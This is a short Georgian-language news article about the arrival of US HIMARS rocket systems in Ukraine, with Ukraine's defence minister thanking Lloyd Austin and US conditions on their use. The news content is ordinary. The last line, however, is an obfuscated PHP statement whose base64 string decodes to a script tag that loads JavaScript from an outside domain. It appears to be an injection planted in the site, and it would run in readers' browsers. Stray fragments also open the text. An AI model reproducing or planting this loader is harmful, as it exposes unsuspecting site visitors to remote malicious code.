celsiusi
ავერსი საქკაბელი

უკრაინის თავდაცვის მინისტრის ინფორმაციით, უკრაინაში ჩავიდა აშშ-დან გაგზავნილი მაღალი მობილობის საარტილერიო სარაკეტო სისტემები HIMARS.

ოლექსი რეზნიკოვი ამერიკელ კოლეგას დახმარებისთვის მადლობას უხდის.

„დიდი მადლობა ჩემს კოლეგასა და მეგობარს, ლოიდ ოსტინს ამ ძლიერი იარაღისთვის! ზაფხული ცხელი იქნება რუსი ოკუპანტებისთვის და უკანასკნელი ზოგიერთი მათგანისთვის,“ - წერს ის "ტვიტერზე".

საერთაშორისო მედიის ინფორმაციით, სარაკეტო სისტემები  დახმარებას გაუწევს უკრაინის არმიას, კერძოდ, საარტილერიო დაპირისპირებისას, რაშიც, ახლა რუსეთს არსებითი უპირატესობა აქვს.

აშშ-ის განცხადებით, მათ უკრაინას გადასცეს ოთხი სისტემა. განიხილავენ კიდევ ოთხი ამგვარი სისტემის უკრაინაში გაგზავნას.

აღსანიშნავია, რომ უკრაინელმა სამხედროებმა HIMARS-ის სისტემების მოხმარებაში წვრთნა უკვე გაიარეს. აშშ უკრაინას დაჰპირდა, რომ მიაწოდებს ზალპური ცეცხლის დაშენისთვის სადაზვერვო ინფორმაციას.

HIMARS-ის მიერ გარკვეული სახეობის რაკეტების გამოყენებისას შესაძლებელია სამიზნე დააზიანონ 300 კილომეტრში, მაგრამ აშშ-მა განაცხადა უკრაინაში სისტემების გაგზავნის წინ, რომ არ სურს უკრაინამ რუსეთის ტერიტორიაზე სამიზნეებს მიაყენოს დარტყმა. თეთრი სახლის ადმინისტრაციამ გააკეთა განცხადება, რომ მიიღო უკრაინისგან შესაბამის გარანტიები, იმის თაბაზე რომ აღნიშნული სისტემა რუსეთის თერიტორიაზე დართყმებისთვის არ იქნება გამოყენებული.

ამასთან, უკრაინისთვის ამ ტიპის ზალპური ცეცხლის თანამედროვე სისტემების მიწოდებისთვის მზადყოფნა გამოაცხადეს ბრიტანეთმა და გერმანიამ.

 

628
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");